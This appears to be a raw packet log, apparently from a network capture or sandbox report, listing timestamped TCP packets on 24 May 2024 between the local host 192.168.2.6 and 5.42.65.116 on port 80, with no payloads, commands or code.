May 24, 2024 00:22:02.486630917 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.486644983 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.486711979 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.486711979 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.488034964 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.488048077 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.488059044 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.488116026 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.488116026 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.489389896 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.489402056 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.489455938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.489455938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.490741968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.490755081 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.490812063 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.490921974 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.571767092 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.571919918 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.572074890 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.572196960 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.572835922 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.572884083 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.573553085 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.573569059 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.573580027 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.573628902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.573628902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.576045990 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.576059103 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.576071024 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.576083899 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.576128006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.576128006 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.577119112 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.577133894 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.577184916 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.578515053 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.578530073 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.578581095 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.578581095 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.580039024 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.580053091 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.580571890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.581350088 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.581363916 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.581413984 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.581413984 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.582672119 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.582686901 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.582699060 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.582736969 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.582737923 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.583667040 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.583681107 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.583729029 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.583729029 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.584811926 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.584826946 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.584870100 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.585903883 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.585918903 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.585953951 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.586235046 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.587055922 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.587069988 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.587081909 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.587110996 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.587125063 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.588169098 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.588181973 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.588733912 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.589293003 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.589339972 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.589391947 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.590450048 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.590465069 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.590501070 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.590533972 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.591558933 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.591573954 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.591984987 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.594676018 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.594687939 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.595423937 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.595638037 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.595652103 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.595786095 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.596602917 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.596617937 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.596679926 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.596679926 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.597511053 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.597524881 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.597567081 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.598630905 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.598644972 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.598654985 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.598685026 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.598715067 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.599425077 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.599440098 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.599488974 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.599488974 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.600254059 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.600266933 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.601151943 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.601165056 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.601198912 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.601198912 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.602083921 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.602097034 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.602108002 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.602138996 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.602138996 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.602503061 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.602972031 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.602987051 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.603039026 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.603039026 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.603848934 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.603862047 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.603872061 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.603924036 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.603924036 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.665080070 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.665093899 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.665146112 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.665146112 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.665497065 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.665822029 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.665976048 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.665987968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.665997982 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.666019917 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.666080952 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.666904926 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.666969061 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.667368889 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.667521000 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.667860985 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.667875051 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.667916059 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.668764114 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.668776035 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.668827057 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.668828011 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.669522047 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.669533968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.669874907 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673259974 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673271894 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673281908 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673293114 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673305988 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673317909 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673330069 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673338890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673338890 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673341036 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673355103 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673659086 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673665047 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673676968 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.673744917 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.673744917 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.674382925 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.674395084 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.674506903 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.675082922 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.675096035 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.675106049 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.675148964 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.675148964 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.675993919 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.676006079 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.676039934 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.676067114 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.677062988 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.677076101 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.677129030 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.677129030 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.677886963 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.677900076 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.678119898 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.678770065 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.678782940 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.678921938 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.679721117 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.679733038 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.679744005 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.679792881 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.679792881 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.680701017 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.680711985 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.681243896 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.681539059 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.681550026 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.681590080 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.681605101 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.682450056 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.682460070 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.682507992 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.683374882 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.683386087 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.683393955 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.683438063 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.683438063 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.684324026 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.684334993 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.684381962 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.684381962 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.685236931 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.685249090 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.685307980 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.685307980 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.686105013 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.686115980 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.686163902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.686163902 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.686969042 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.686981916 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.687123060 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.687879086 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.687891960 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.687900066 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.687942028 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.687942028 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.688755035 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.688766003 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.688860893 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.689647913 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.689660072 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.689699888 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.689699888 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.690541983 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.690553904 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.690623999 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.691384077 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.691396952 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.691406012 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.691430092 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.691459894 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.692244053 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.692255974 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.692306995 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.692306995 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.693120956 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.693134069 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.693180084 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.693180084 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.693945885 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.693958998 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.694001913 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.694782972 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.694797039 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.695081949 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.695641041 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.695653915 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.695663929 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.695686102 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.695710897 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.695710897 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.696511984 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.696525097 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.696693897 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.697355986 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.697370052 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.697419882 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.697419882 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.698188066 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.698200941 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.698431969 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.699068069 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.699081898 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.699091911 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.699137926 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.699137926 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.699891090 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.699903965 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.699958086 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.699959040 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.700793982 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.700807095 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.700876951 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.701612949 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.701626062 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.701680899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.701680899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.702707052 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.702718973 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.702761889 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.703293085 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.703306913 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.703318119 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.703341961 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.703371048 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.704166889 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.704179049 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.704221964 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.704221964 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.705007076 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.705018997 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.705174923 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.705862045 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.705873966 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.705883980 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.705934048 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.705934048 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.750442982 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.750627041 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.765194893 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.765408039 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.765413046 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.765701056 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.765825033 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.766141891 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.766272068 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.766285896 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.766295910 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.766329050 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.766352892 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.767074108 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767517090 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.767520905 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767735004 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.767941952 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767955065 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767963886 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767980099 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.767999887 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.768027067 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.768027067 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.768800020 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.768811941 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.768861055 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.768861055 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.769655943 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.769666910 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.769676924 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.769728899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.769728899 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.770533085 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.770545006 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.770586014 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:02.771341085 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.771352053 CEST	80	49714	5.42.65.116	192.168.2.6
May 24, 2024 00:22:02.771476030 CEST	49714	80	192.168.2.6	5.42.65.116
